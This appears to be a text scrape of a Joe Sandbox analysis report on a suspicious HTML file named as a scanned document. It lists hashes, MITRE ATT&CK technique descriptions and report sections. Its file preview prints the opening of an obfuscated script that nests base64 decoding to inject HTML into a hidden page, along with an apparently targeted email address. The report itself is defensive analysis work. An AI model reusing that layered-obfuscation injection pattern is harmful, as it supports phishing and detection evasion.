MD5:	EF24D7B889669ED456F3BB700F8482CD
SHA1:	281923FC8E690D4E893453CBEA3B8B067CDAA4C0
SHA-256:	6B286061B95C551419AEE456F6FEA1B09BCA0322F13BED4301FA8F944B121264
SHA-512:	E27AD238012CFF7EAA024BB2F52C089B213D7AE6EA4496B3D5A143FADD57B6E45BB5F4AE5E8F17A37C7F93E15D574E96A816D0BD16A4AAD268D4A9AF7615C22C
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR.............w.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............IDATx...w..U.......no.M...!.. U...C/..J..X.M.........P$.BBQ.QDA...T.H."%...IH...{....P.&{w........R....s>..Y#......-...6Sl.zj.F....d.h.FO^...+[/k2...bF2u2..5U.......e?..2.....h..+.._..n..!i...Z-..#..hm....j.<.6..;......Uj...V.............H.)S....... k.C..`..............YRmB.z....f.<.RE-7.YQTq..YndV.Ma...x]W.m."..........;.9.+.3.0....pc.p..i..i..K.@L[.....i..W.....%.`_.+.....r"....L.....j.d_-.Ge...x..x+..V..8.T.R..[.E#.}......o_.9.K.D........p_[[F+..3.d..m.1c%M....j.rR..y.JO..g......\|s.s..............2ujs...\.v.#.d.&..m$..'.6X.9#=e...<.x.#.W.........C....Dg....v.2;...e......:V..z.z.qc....>.9sV.....(`....\|.k5..];.=oWc.f?.!.l.2.<jm.~..\|...f.n'..........y.....OE.e..2.v.\|.A?tIz\.2z.P.....N,..$..,..P.....g...}%}J.(BA..I.~Iw.V.t^2.......H..X...OrSgM.{..5.H........!.{..}E...y/.....G.....f...>).C$....#.^.t.d.d..5{..D..@.P......R[e.n.....t..

Static File Info

General

File type:	HTML document, ASCII text, with very long lines (59971), with CRLF line terminators
Entropy (8bit):	5.4082875439575435
TrID:	HyperText Markup Language (15015/1) 55.58% HyperText Markup Language (12001/1) 44.42%
File name:	ScannedFileCopy8475.html
File size:	920362
MD5:	9a580f2e9f88aad5f60b02d775596e37
SHA1:	f9b1a8953113077f96acb4264754e94964d14d43
SHA256:	f31f1852b141c2680ada8b4b977b6cf150efbda99a584e858a21b332452f2626
SHA512:	c5725e9180c44f1a974f86fd9b954328f4b55cfb991e44e015578904b2476932dd752f8f40d998acfac5d1087fde12ee8beab083697a871cb4d502f74f4e4ce3
SSDEEP:	24576:GlES4FbxosB/MK0cJLELW2Tzo1PE0RPew/AcEWw+dGoxGcTIlKm9f3fIw7Ur/0dz:Ks8aSZ
TLSH:	D7155B13AF95DEFA9B8D5A0D54492B1C83F0711A7E23D01EED919BC4FB86C0742DA12E
File Content Preview:	<!DOCTYPE html>..<html id="rrt" ssvv="vdaponte@sumhlc.org" lang="en">....<head></head>.. jjhhdh -->....<body style="display: none;" id="bbdy">.... <script>.. document.head.insertAdjacentHTML("beforeend", atob(atob(atob(atob(atob(atob(atob(at

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ScannedFileCopy8475.html

Overview

General Information

Detection

Signatures

Classification

Process Tree

Yara Signatures

HTML

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Software Vulnerabilities

Networking

System Summary

Malware Analysis System Evasion

Mitre Att&ck Matrix

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Created / dropped Files

C:\Users\user\Documents\Outlook Files\Outlook Data File - NoEmail.pst

Chrome Cache Entry: 111

Chrome Cache Entry: 112

Chrome Cache Entry: 113

Chrome Cache Entry: 114

Chrome Cache Entry: 115

Chrome Cache Entry: 116

Chrome Cache Entry: 118

Chrome Cache Entry: 119

Chrome Cache Entry: 121

Chrome Cache Entry: 122

Chrome Cache Entry: 123

Chrome Cache Entry: 124

Chrome Cache Entry: 125

Chrome Cache Entry: 128

Chrome Cache Entry: 129

Chrome Cache Entry: 130

Chrome Cache Entry: 131

Chrome Cache Entry: 132

Chrome Cache Entry: 133

Static File Info

General

Windows Analysis Report
ScannedFileCopy8475.html